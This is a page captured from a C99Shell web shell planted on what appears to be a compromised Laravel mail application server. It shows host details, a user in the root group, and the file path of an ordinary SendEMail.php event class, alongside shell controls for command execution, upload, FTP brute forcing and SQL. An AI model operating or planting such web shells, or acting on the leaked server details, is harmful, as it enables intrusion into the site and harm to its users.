!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/app/Events/   drwxr-xr-x
Free 29.25 GB of 117.98 GB (24.79%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SendEMail.php (1.71 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Events;

use 
Illuminate\Broadcasting\Channel;
use 
Illuminate\Broadcasting\InteractsWithSockets;
use 
Illuminate\Broadcasting\PresenceChannel;
use 
Illuminate\Broadcasting\PrivateChannel;
use 
Illuminate\Contracts\Broadcasting\ShouldBroadcast;
use 
Illuminate\Foundation\Events\Dispatchable;
use 
Illuminate\Queue\SerializesModels;
use 
Illuminate\Support\Facades\Config;
use 
Illuminate\Support\Facades\Log;

class 
SendEMail
{
    use 
DispatchableInteractsWithSocketsSerializesModels;

    public 
$to;
    public 
$subject;
    public 
$body;
    public 
$reply_to;
    public 
$attachments;
    public 
$config;
    public 
$email_queue_id;
    public 
$from;
    public 
$from_email;
    public 
$from_name;

    
/**
     * Create a new event instance.
     * @param $from
     * @param $fromEmail
     * @param $to
     * @param $subject
     * @param $body
     * @param $reply_to

     * @return void
     */
    
public function __construct($from,$fromEmail,$fromName,$to$subject$body$reply_to=null$attachments=null$sendingServer=null$email_queue_id=null)
    {
        
$this->from $from;
        
$this->from_email $fromEmail;
        
$this->from_name $fromName;
        
$this->to $to;
        
$this->subject $subject;
        
$this->body $body;
        
$this->reply_to $reply_to;
        
$this->attachments=$attachments;
        
$this->config=$sendingServer;
        
$this->email_queue_id=$email_queue_id;
    }



    
/**
     * Get the channels the event should broadcast on.
     *
     * @return \Illuminate\Broadcasting\Channel|array
     */
    
public function broadcastOn()
    {
        return new 
PrivateChannel('channel-name');
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0067 ]--